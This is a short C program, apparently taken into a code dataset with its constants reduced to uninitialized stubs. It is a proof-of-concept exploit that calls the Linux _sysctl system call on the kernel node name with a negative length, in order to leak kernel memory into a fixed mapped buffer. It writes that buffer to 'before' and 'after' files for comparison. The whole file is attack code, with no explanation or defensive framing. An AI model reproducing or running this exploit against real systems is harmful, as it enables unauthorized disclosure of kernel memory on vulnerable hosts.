
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct __sysctl_args {int* name; int nlen; char* oldval; int* oldlenp; scalar_t__ newlen; scalar_t__ newval; } ;


 int BUFLEN ;
 int CTL_KERN ;
 int KERN_NODENAME ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 int O_CREAT ;
 int O_RDWR ;
 int O_TRUNC ;
 int O_WRONLY ;
 int PROT_READ ;
 int PROT_WRITE ;
 int _sysctl (struct __sysctl_args*) ;
 int memset (char*,char,int ) ;
 char* mmap (void*,int ,int,int,int,int ) ;
 int open (char*,int,...) ;
 int write (int,char*,int ) ;

int
main(int argc, const char* argv[])
{
  struct __sysctl_args args_of_great_doom;

  int names[2] = { CTL_KERN, KERN_NODENAME };

  int dodgy_len = -2000000000;
  int fd;
  char* p_buf;

  fd = open("/dev/zero", O_RDWR);
  p_buf = mmap((void*)8192, BUFLEN, PROT_READ | PROT_WRITE,
               MAP_FIXED | MAP_PRIVATE, fd, 0);

  memset(p_buf, '\0', BUFLEN);
  fd = open("before", O_CREAT | O_TRUNC | O_WRONLY, 0777);
  write(fd, p_buf, BUFLEN);

  args_of_great_doom.name = names;
  args_of_great_doom.nlen = 2;
  args_of_great_doom.oldval = p_buf;
  args_of_great_doom.oldlenp = &dodgy_len;
  args_of_great_doom.newval = 0;
  args_of_great_doom.newlen = 0;

  _sysctl(&args_of_great_doom);

  fd = open("after", O_CREAT | O_TRUNC | O_WRONLY, 0777);
  write(fd, p_buf, BUFLEN);
}
